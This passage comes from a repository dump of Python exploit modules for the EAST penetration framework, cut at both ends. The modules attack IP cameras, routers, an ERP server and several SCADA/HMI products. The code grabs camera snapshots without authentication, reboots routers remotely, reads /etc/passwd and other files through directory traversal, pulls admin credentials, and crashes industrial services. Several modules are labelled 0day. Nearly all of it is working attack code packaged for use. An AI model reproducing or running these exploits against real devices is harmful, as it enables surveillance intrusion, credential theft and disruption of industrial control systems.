" % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_ezviz_cs_cv210_ipcamera_snapshot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | from collections import OrderedDict 5 | 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efa_ezviz_cs_cv210_ipcamera_snapshot" 10 | INFO['DESCRIPTION'] = "Hikvision Ezviz CS-CV210(C3s) Snapshot" 11 | INFO['VENDOR'] = "http://www.ezvizlife.com/" 12 | INFO["CVE Name"] = "0day" 13 | INFO["NOTES"] = """ 14 | Remote attaker can make snapshot. Authorization is not required. 15 | Tested against Ezviz CS-CV210 firmware v5.2.7. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "" 18 | INFO["LINKS"] = [] 19 | INFO['CHANGELOG']="12 Apr, 2017" 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.45" 25 | OPTIONS["PORT"] = 80 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def make_url(self, path=''): 40 | return 'http://%s:%s/%s' % (self.host, self.port, path) 41 | 42 | def make_request(self, path=''): 43 | url = self.make_url(path) 44 | res = urllib2.urlopen(url) 45 | return res.read() 46 | 47 | def run(self): 48 | #Get options from gui 49 | self.args() 50 | self.log('[*] Trying to get snapshot') 51 | res = self.make_request('onvif/snapshot') 52 | self.logImage(res) 53 | self.finish(True) 54 | 55 | 56 | if __name__ == '__main__': 57 | """ 58 | By now we only have the tool 59 | mode for exploit.. 
60 | Later we would have 61 | standalone mode also. 62 | """ 63 | print "Running exploit %s .. " % INFO['NAME'] 64 | e = exploit("192.168.0.1",80) 65 | e.run() 66 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_iball_adsl2_router_rr.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_iball_adsl2_router_rr" 15 | INFO['DESCRIPTION'] = "iBall ADSL2+ Home Router - Reset Router" 16 | INFO['VENDOR'] = "https://www.iball.co.in" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['http://0day.today/exploit/28572'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | iBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. Firmware version: FW_iB-LR7011A_1.0.2 22 | """ 23 | 24 | INFO['CHANGELOG'] = "20 Sep, 2017. Written by Gleg team." 
25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return 'http://{}:{}{}'.format(self.host, self.port, path) 46 | 47 | def run(self): 48 | self.args() 49 | self.log("Attacking {}".format(self.host)) 50 | 51 | #url = self.make_url('/info.cgi') 52 | #try: 53 | # fd = urllib2.urlopen(url) 54 | # self.log(fd.read()) 55 | #except Exception as e: 56 | # self.log(e) 57 | # self.finish(False) 58 | 59 | url = self.make_url('/resetrouter.cgi') 60 | request = urllib2.Request(url) 61 | try: 62 | fd = urllib2.urlopen(request) 63 | result = fd.read() 64 | except Exception as e: 65 | self.log(e) 66 | self.finish(False) 67 | self.log('The DSL Router is rebooting.') 68 | self.finish(True) 69 | 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | 76 | print "Running exploit %s .. 
" % INFO['NAME'] 77 | e = exploit('', 80) 78 | e.run() 79 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_orient_ip33_sh14cp_snapshot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import urllib 5 | import os 6 | import struct 7 | import tarfile 8 | import base64 9 | from cStringIO import StringIO 10 | import time 11 | from collections import OrderedDict 12 | from core.WebHelper import FormPoster 13 | from Sploit import Sploit 14 | 15 | INFO = {} 16 | INFO['NAME'] = "efa_orient_ip33_sh14cp_snapshot" 17 | INFO['DESCRIPTION'] = "Orient IP-33-SH14CP IP Camera Snapshot" 18 | INFO['VENDOR'] = "http://www.orientrus.ru/" 19 | INFO["CVE Name"] = "0day" 20 | INFO["DOWNLOAD_LINK"] = "" 21 | INFO["LINKS"] = [] 22 | INFO['CHANGELOG'] = "12 May, 2017" 23 | INFO['PATH'] = "General/" 24 | INFO["NOTES"] = """ 25 | Unauthorized attacker can make snapshot. 26 | Tested against firmware 3518C_IMX225_W_6.1.23.2_A3. 
27 | """ 28 | 29 | # Must be in every module, to be set by framework 30 | OPTIONS = OrderedDict() 31 | OPTIONS["HOST"] = "192.168.1.13" 32 | OPTIONS["PORT"] = 80 33 | 34 | 35 | class exploit(Sploit): 36 | def __init__(self,host="", 37 | port=0, ssl=False, 38 | logger=None): 39 | Sploit.__init__(self, logger=logger) 40 | 41 | def args(self): 42 | self.args = Sploit.args(self, OPTIONS) 43 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 44 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 45 | 46 | def make_url(self, path=''): 47 | url = 'http://{}:{}/{}'.format(self.host, self.port, path) 48 | return url 49 | 50 | def run(self): 51 | #Get options from gui 52 | self.args() 53 | self.log("[*] Trying to connect to {}".format(self.make_url())) 54 | url = self.make_url('snap.jpg') 55 | res = urllib2.urlopen(url).read() 56 | self.logImage(res) 57 | self.finish(True) 58 | 59 | 60 | if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1",80) 69 | e.run() 70 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_tp_link_tl_wa850re_rr.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_tp_link_tl_wa850re_rr" 15 | INFO['DESCRIPTION'] = "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthorized Remote Reboot" 16 | INFO['VENDOR'] = "https://www.tp-link.com/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://packetstormsecurity.com/files/147397/TP-Link-Technologies-TL-WA850RE-Wi-Fi-Range-Extender-Unauthorized-Remote-Reboot.html'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | TP-Link Technologies TL-WA850RE Wi-Fi Range Extender suffers from an unauthorized remote reboot vulnerability. 22 | """ 23 | 24 | INFO['CHANGELOG'] = "28 Apr, 2018. Written by Gleg team." 25 | INFO['PATH'] = 'Exploits/Hardware/' 26 | 27 | # Must be in every module, to be set by framework 28 | OPTIONS = {} 29 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 30 | OPTIONS["PORT"] = 80 31 | 32 | class exploit(Sploit): 33 | def __init__(self, host = "", port = 0, logger = None): 34 | Sploit.__init__(self, logger = logger) 35 | self.name = INFO['NAME'] 36 | self.port = port 37 | self.host = host 38 | 39 | def args(self): 40 | self.args = Sploit.args(self, OPTIONS) 41 | self.port = int(self.args.get('PORT', self.port)) 42 | self.host = self.args.get('HOST', self.host) 43 | 44 | def make_url(self, path = ''): 45 | return 'http://{}:{}{}'.format(self.host, self.port, path) 46 | 47 | def run(self): 48 | self.args() 49 | self.log("Attacking {}".format(self.host)) 50 | 51 | url = self.make_url('/data/reboot.json') 52 | data = 'operation=write' 53 | 54 | request = urllib2.Request(url, data) 55 | request.add_header('X-Requested-With', 'XMLHttpRequest') 56 | 
request.add_header('Accept', 'application/json, text/javascript, */*;') 57 | request.add_header('Cookie', 'COOKIE=') 58 | try: 59 | fd = urllib2.urlopen(request) 60 | result = fd.read() 61 | except Exception as e: 62 | self.log(e) 63 | self.finish(False) 64 | self.log('Router is rebooting.') 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. " % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_uc_httpd_directory_traversal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import httplib 5 | import sys 6 | httplib.HTTPConnection._http_vsn = 10 7 | httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0' 8 | from collections import OrderedDict 9 | from Sploit import Sploit 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efa_uc_httpd_directory_traversal" 13 | INFO['DESCRIPTION'] = "uc-httpd Daemon Directory Traversal/LFI" 14 | INFO['VENDOR'] = "" 15 | INFO["CVE Name"] = "" 16 | INFO["DOWNLOAD_LINK"] = "" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG']="03 Apr, 2017. Written by Gleg team." 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | uc-httpd is a HTTP daemon used by a wide array of IoT devices (primarily security cameras) which is vulnerable 22 | to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with 23 | around one million vulnerable surviellence cameras. 
24 | 25 | The following request can be made to display the contents of the 'passwd' file: 26 | GET ../../../../../etc/passwd HTTP/1.0 27 | 28 | To display a directory listing, the following request can be made: 29 | GET ../../../../../var/www/html/ HTTP/1.0 30 | The above request would output the contents of the webroot directory as if 'ls' command was executed 31 | """ 32 | 33 | # Must be in every module, to be set by framework 34 | OPTIONS = OrderedDict() 35 | OPTIONS["HOST"] = "192.168.1.2" 36 | OPTIONS["PORT"] = 8000 37 | OPTIONS["FILENAME"] = '../../../../../etc/passwd' 38 | 39 | 40 | class exploit(Sploit): 41 | def __init__(self,host="", 42 | port=0, ssl=False, 43 | logger=None): 44 | Sploit.__init__(self, logger=logger) 45 | 46 | def args(self): 47 | self.args = Sploit.args(self, OPTIONS) 48 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 49 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 50 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]) 51 | 52 | def make_req(self, path=''): 53 | url = 'http://%s:%s/%s' % (self.host, self.port, path) 54 | res = urllib2.urlopen(url).read() 55 | return res 56 | 57 | def run(self): 58 | #Get options from gui 59 | self.args() 60 | self.log('[*] Connecting to %s:%s' % (self.host, self.port)) 61 | self.make_req() 62 | self.log('[*] Getting contents of %s' % self.filename) 63 | res = self.make_req(self.filename) 64 | self.log(res) 65 | self.finish(True) 66 | 67 | 68 | if __name__ == '__main__': 69 | """ 70 | By now we only have the tool 71 | mode for exploit.. 72 | Later we would have 73 | standalone mode also. 74 | """ 75 | print "Running exploit %s .. 
" % INFO['NAME'] 76 | e = exploit("192.168.0.1",80) 77 | e.run() 78 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_vstarcom_ip_camera_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import httplib 5 | from collections import OrderedDict 6 | 7 | from Sploit import Sploit 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efa_vstarcom_ip_camera_info_disclosure" 11 | INFO['DESCRIPTION'] = "Vstarcam T6892 Information Disclosure" 12 | INFO['VENDOR'] = "http://www.vstarcam.com/" 13 | INFO["CVE Name"] = "2017-5674" 14 | INFO["NOTES"] = """ 15 | Vulnerability allows to get admin credentials. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "" 18 | INFO["LINKS"] = [] 19 | INFO['CHANGELOG']="13 Apr, 2017" 20 | INFO['PATH'] = "General/" 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.42" 25 | OPTIONS["PORT"] = 81 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def run(self): 40 | #Get options from gui 41 | self.args() 42 | self.log("[*] Connecting to %s:%s" % (self.host, self.port)) 43 | h1 = httplib.HTTPConnection(self.host, self.port) 44 | h1.request('GET', 'login.cgi') 45 | r1 = h1.getresponse().read() 46 | self.log('[+] Admin credentials are:\r\n%s' % r1) 47 | self.finish(True) 48 | 49 | 50 | if __name__ == '__main__': 51 | """ 52 | By now we only have the tool 53 | mode for exploit.. 54 | Later we would have 55 | standalone mode also. 56 | """ 57 | print "Running exploit %s .. 
" % INFO['NAME'] 58 | e = exploit("192.168.0.1",80) 59 | e.run() 60 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/LICENSE.txt: -------------------------------------------------------------------------------- 1 | https://www.gnu.org/licenses/gpl-3.0.txt -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/changelog.txt: -------------------------------------------------------------------------------- 1 | 2 | 1.0 3 | September 18, 2022 4 | 5 | efa_delta_mcis_upsentry2012_info_disclosure.py 6 | efa_open_source_erp_arbitrary_sql_execution.py 7 | efa_open_source_erp_dir_trav.py 8 | efs_advantech_webaccess_8_3_2_dashboardconfig_afd.py 9 | efs_advantech_webaccess_8_3_2_dashboard_bsqli.py 10 | efs_advantech_webaccess_8_3_directory_traversal.py 11 | efs_advantech_webaccess_8_3_file_delete.py 12 | efs_advantech_webaccess_dashboardeditor_afd.py 13 | efs_atvise_3_2_afd.py 14 | efs_atvise_3_2_info_disclosure.py 15 | efs_autobase_netserver_dos.py 16 | efs_Becknoff_CX9020_Reboot.py 17 | efs_cogent_datahub_7_3_x_dos.py 18 | efs_delta_DIAEnergie_info_disclosure.py 19 | efs_DELTA_IA_Robot_DRAstudio_afd.py 20 | efs_DoMore_Designer_afd.py 21 | efs_eisbaer_scada_directory_traversal2.py 22 | efs_eisbaer_scada_dt.py 23 | efs_Elipse_E3_e3server_remote_stop.py 24 | efs_esa_automation_crew_webserver_dir_trav.py 25 | efs_GP_PRO_EX_WinGP_Runtime_afd.py 26 | efs_indigo_scada_information_disclosure.py 27 | efs_inductive_automation_7_6_4_designer_xxe.py 28 | efs_inductive_automation_ignition_7_5_4_bSQLi.py 29 | efs_inductive_automation_ignition_7_5_4_xxe.py 30 | efs_infrasightlabs_vscopeserver_privilege_escalation.py 31 | efs_IPESOFT_D2000_SCADA_DirTrav.py 32 | efs_kingscada_aeserver_dos.py 33 | efs_laquis_scada_directory_traversal.py 34 | efs_logi_cals_logi_RTS_dir_trav.py 35 | efs_logi_cals_logi_RTS_RTShttpd_DoS.py 36 | efs_loytec_lweb900_server_dir_trav.py 37 | 
efs_lsis_wXP_DoS.py 38 | efs_lsis_XP_Manager_DoS.py 39 | efs_moxa_mxview_dos.py 40 | efs_OpenAPC_BeamServer_DoS.py 41 | efs_OSHMI_remote_shutdown.py 42 | efs_PASvisu_dos.py 43 | efs_PeakHMI_Webserver_DirTrav.py 44 | efs_promotic_scada_dos.py 45 | efs_quickhmi_directory_traversal.py 46 | efs_rcware_dos.py 47 | efs_reliance_scada_directory_traversal.py 48 | efs_s3scada_remote_stop.py 49 | efs_SpiderControl_SCADA_Editor_DirTrav.py 50 | efs_trihedral_vtscada_dos.py 51 | efs_u_motion_builder_hardcoded_credentials.py 52 | efs_vbase_vokserver_info_disclosure.py 53 | efs_winplc7_webserver_arbitrary_file_disclosure.py 54 | efs_wintr_scada_hardcoded_credentials_directory_traversal.py -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efa_open_source_erp_dir_trav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | import cookielib 4 | import json 5 | from collections import OrderedDict 6 | 7 | 8 | from Sploit import Sploit 9 | 10 | INFO = {} 11 | INFO['NAME'] = "efa_open_source_erp_dir_trav" 12 | INFO['DESCRIPTION'] = "OpenSource ERP Directory Traversal" 13 | INFO['VENDOR'] = "http://www.nelson-it.ch/" 14 | INFO["CVE Name"] = "0day" 15 | INFO["DOWNLOAD_LINK"] = "http://www.nelson-it.ch/download/" 16 | INFO["LINKS"] = [] 17 | INFO['CHANGELOG'] = "1 Jun, 2018" 18 | INFO['PATH'] = "WEB/" 19 | INFO["NOTES"] = """ 20 | Remote attacker can read arbitrary files on server using '\..' combination. 21 | Tested against OpenSource ERP 6.3.0 on Windows 7 x64 SP1. 
22 | """ 23 | 24 | # Must be in every module, to be set by framework 25 | OPTIONS = OrderedDict() 26 | OPTIONS["HOST"] = "192.168.1.103" 27 | OPTIONS["PORT"] = 8024 28 | OPTIONS["FILENAME"] = "windows/win.ini" 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self,host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.payload = "" 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | self.filename = self.args.get("FILENAME", OPTIONS["FILENAME"]).replace('/', '\\') 43 | 44 | def make_url(self, path=''): 45 | url = 'http://{}:{}/'.format(self.host, self.port) + path 46 | return url 47 | 48 | def run(self): 49 | # Get options from gui 50 | self.args() 51 | self.log('[*] Trying to recieve ' + self.filename) 52 | url = self.make_url('main/login/' + '..\\'*8 + self.filename) 53 | res = urllib2.urlopen(url).read() 54 | if res < 15000: 55 | self.log(res) 56 | self.writefile(res, self.filename.replace('\\', '/').split('/').pop()) 57 | self.log(res) 58 | self.finish(True) 59 | 60 | 61 | if __name__ == '__main__': 62 | """ 63 | By now we only have the tool 64 | mode for exploit.. 65 | Later we would have 66 | standalone mode also. 67 | """ 68 | print "Running exploit %s .. 
" % INFO['NAME'] 69 | e = exploit("192.168.0.1",80) 70 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_OSHMI_remote_shutdown.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import json 5 | import socket 6 | import time 7 | from collections import OrderedDict 8 | from Sploit import Sploit 9 | 10 | 11 | INFO = {} 12 | INFO['NAME'] = "efs_OSHMI_remote_shutdown" 13 | INFO['DESCRIPTION'] = "OSHMI remote shutdown" 14 | INFO['VENDOR'] = "https://sourceforge.net/projects/oshmiopensubstationhmi/" 15 | INFO["CVE Name"] = "0day" 16 | INFO["DOWNLOAD_LINK"] = "https://sourceforge.net/projects/oshmiopensubstationhmi/" 17 | INFO["LINKS"] = [] 18 | INFO['CHANGELOG'] = "7 Jun, 2018" 19 | INFO['PATH'] = "General/" 20 | INFO["NOTES"] = """ 21 | Specially crafted HTTP request allows to shutdown webserver. Authentication is not required. 22 | Tested against OSHMI 4.15 on Windows 7 SP1 x64. 
23 | """ 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = OrderedDict() 27 | OPTIONS["HOST"] = "192.168.1.103" 28 | OPTIONS["PORT"] = 51909 29 | 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host="", 33 | port=0, ssl=False, 34 | logger=None): 35 | Sploit.__init__(self, logger=logger) 36 | self.name = INFO['NAME'] 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 41 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 42 | 43 | def make_url(self, path=''): 44 | url = "http://%s:%s/%s" % (self.host, self.port, path) 45 | return url 46 | 47 | def run(self): 48 | # Get options from gui 49 | self.args() 50 | self.log('[*] Sending shutdown request') 51 | url = self.make_url('htdocs/shellapi.rjs?Y') 52 | res = urllib2.urlopen(url).read() 53 | if 'error' in res and 'none' in res: 54 | self.log('[+] Request successfully executed') 55 | else: 56 | self.log('[-] Request execution failed') 57 | self.log('[*] Checking service') 58 | time.sleep(5) 59 | try: 60 | res = urllib2.urlopen(url, timeout=10) 61 | except socket.timeout as e: 62 | self.log('[+] Service not responds') 63 | self.finish(True) 64 | self.finish(False) 65 | 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool 70 | mode for exploit.. 71 | Later we would have 72 | standalone mode also. 73 | """ 74 | print "Running exploit %s .. 
" % INFO['NAME'] 75 | e = exploit("192.168.0.1", 80) 76 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_OpenAPC_BeamServer_DoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import time 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_OpenAPC_BeamServer_DoS" 11 | INFO['DESCRIPTION'] = "OpenAPC BeamServer DoS" 12 | INFO['VENDOR'] = "https://www.openapc.com/" 13 | INFO["CVE Name"] = "0day" 14 | INFO["DOWNLOAD_LINK"] = "https://www.openapc.com/download.php" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "8 Jun, 2018" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Specially crafted TCP request crashes BeamServer.exe. 20 | Tested against OpenAPC 5.3-1 on Windows 7 SP1 x64. 21 | """ 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.103" 26 | OPTIONS["PORT"] = 11350 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def run(self): 42 | # Get options from gui 43 | self.args() 44 | self.log('[*] Testing connection to BeamServer') 45 | s = socket.socket() 46 | s.connect((self.host, self.port)) 47 | self.log('[*] Sending DoS packet') 48 | s.send('CmdListName\r\n') 49 | self.log('[*] Checking BeamServer...') 50 | time.sleep(5) 51 | try: 52 | s.connect((self.host, self.port)) 53 | except: 54 | self.log('[+] Service not responds') 55 | self.finish(True) 56 | self.log('[-] Service is still alive') 57 | self.finish(False) 58 | 59 | 60 
| if __name__ == '__main__': 61 | """ 62 | By now we only have the tool 63 | mode for exploit.. 64 | Later we would have 65 | standalone mode also. 66 | """ 67 | print "Running exploit %s .. " % INFO['NAME'] 68 | e = exploit("192.168.0.1", 80) 69 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_PASvisu_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import socket 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | 9 | INFO = {} 10 | INFO['NAME'] = "efs_PASvisu_dos" 11 | INFO['DESCRIPTION'] = "Pilz PASvisu DoS" 12 | INFO['VENDOR'] = "https://www.pilz.com" 13 | INFO["CVE Name"] = "0day" 14 | INFO["DOWNLOAD_LINK"] = "" 15 | INFO["LINKS"] = [] 16 | INFO['CHANGELOG'] = "22 Sep, 2017" 17 | INFO['PATH'] = "General/" 18 | INFO["NOTES"] = """ 19 | Specially crafted TCP request cause DoS. Authentication is not required. 20 | Tested against PASvisu 1.4 on Windows 7 SP1 x64. 
21 | """ 22 | 23 | # Must be in every module, to be set by framework 24 | OPTIONS = OrderedDict() 25 | OPTIONS["HOST"] = "192.168.1.176" 26 | OPTIONS["PORT"] = 40856 27 | 28 | 29 | class exploit(Sploit): 30 | def __init__(self, host="", 31 | port=0, ssl=False, 32 | logger=None): 33 | Sploit.__init__(self, logger=logger) 34 | self.name = INFO['NAME'] 35 | 36 | def args(self): 37 | self.args = Sploit.args(self, OPTIONS) 38 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 39 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 40 | 41 | def make_url(self, path=''): 42 | url = "http://%s:%s/%s" % (self.host, self.port, path) 43 | return url 44 | 45 | def run(self): 46 | # Get options from gui 47 | self.args() 48 | self.log('[*] Sending DoS request') 49 | url = self.make_url('license_update/export') 50 | try: 51 | res = urllib2.urlopen(url, timeout=10) 52 | except socket.timeout as e: 53 | self.log('[+] Server not responds') 54 | self.finish(True) 55 | self.finish(False) 56 | 57 | 58 | if __name__ == '__main__': 59 | """ 60 | By now we only have the tool 61 | mode for exploit.. 62 | Later we would have 63 | standalone mode also. 64 | """ 65 | print "Running exploit %s .. " % INFO['NAME'] 66 | e = exploit("192.168.0.1", 80) 67 | e.run() -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_autobase_netserver_dos.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import time 7 | import socket 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "efs_autobase_netserver_dos" 14 | INFO['DESCRIPTION'] = "AutoBase Network Server 10.2.6.1 Denial Of Service" 15 | INFO['VENDOR'] = "http://www.autobase.biz" 16 | INFO['DOWNLOAD_LINK'] = 'http://file.autobase.biz/Autobase/ExeFiles/Autobase_10_2_6.exe' 17 | INFO['LINKS'] = '' 18 | INFO["CVE Name"] = "0-day" 19 | INFO["NOTES"] = """ 20 | Tested against AutoBase Network Server 10.2.6.1 21 | """ 22 | 23 | INFO['CHANGELOG'] = "10 Mar, 2016. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/DoS/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS["HOST"] = "127.0.0.1" 29 | OPTIONS["PORT"] = 7001 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.host = host 36 | self.port = port 37 | self.ssl = None 38 | self.state = "running" 39 | return 40 | 41 | def args(self): 42 | self.args = Sploit.args(self, OPTIONS) 43 | self.host = self.args.get('HOST', self.host) 44 | self.port = int(self.args.get('PORT', self.port)) 45 | return 46 | 47 | def makesploit(self): 48 | return 'A' * 1024 49 | 50 | def run(self): 51 | self.args() 52 | self.log("Attacking {}".format(self.host)) 53 | 54 | data = self.makesploit() 55 | for i in xrange(10000): 56 | s = socket.socket() 57 | #s.settimeout(10) 58 | try: 59 | s.connect((self.host, self.port)) 60 | s.sendall(data) 61 | s.close() 62 | except: 63 | self.log("Attack reported no open socket - service died?") 64 | self.log("Service died after {} sent packets".format(i)) 65 | self.finish(True) 66 | return 1 67 | 68 | self.log("Finished 
this exploit") 69 | self.finish(False) 70 | if __name__ == '__main__': 71 | """ 72 | By now we only have the tool mode for exploit.. 73 | Later we would have standalone mode also. 74 | """ 75 | print "Running exploit %s .. " % INFO['NAME'] 76 | e = exploit('', 80) 77 | e.run() 78 | -------------------------------------------------------------------------------- /3rdParty/ef_scada_pack_demo/exploits/efs_cogent_datahub_7_3_x_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import errno 5 | import socket 6 | from collections import OrderedDict 7 | 8 | from Sploit import Sploit 9 | INFO = {} 10 | INFO['NAME'] = "efs_cogent_datahub_7_3_x_dos" 11 | INFO['DESCRIPTION'] = "Cogent Datahub 7.3.x Denial of Service" 12 | INFO['VENDOR'] = "http://www.cogentdatahub.com/" 13 | INFO["CVE Name"] = "" 14 | INFO["NOTES"] = """ 15 | Specially crafted GET request cause DoS. Also works on version 8. 16 | Checked against version 7.3.14.585 and 8.0 on Windows 7 SP1 x64. 17 | """ 18 | INFO["DOWNLOAD_LINK"] = "http://www.cogentdatahub.com/Download_Software.html" 19 | INFO["LINKS"] = [""] 20 | INFO['CHANGELOG']="17 Nov, 2017. Written by Gleg team." 
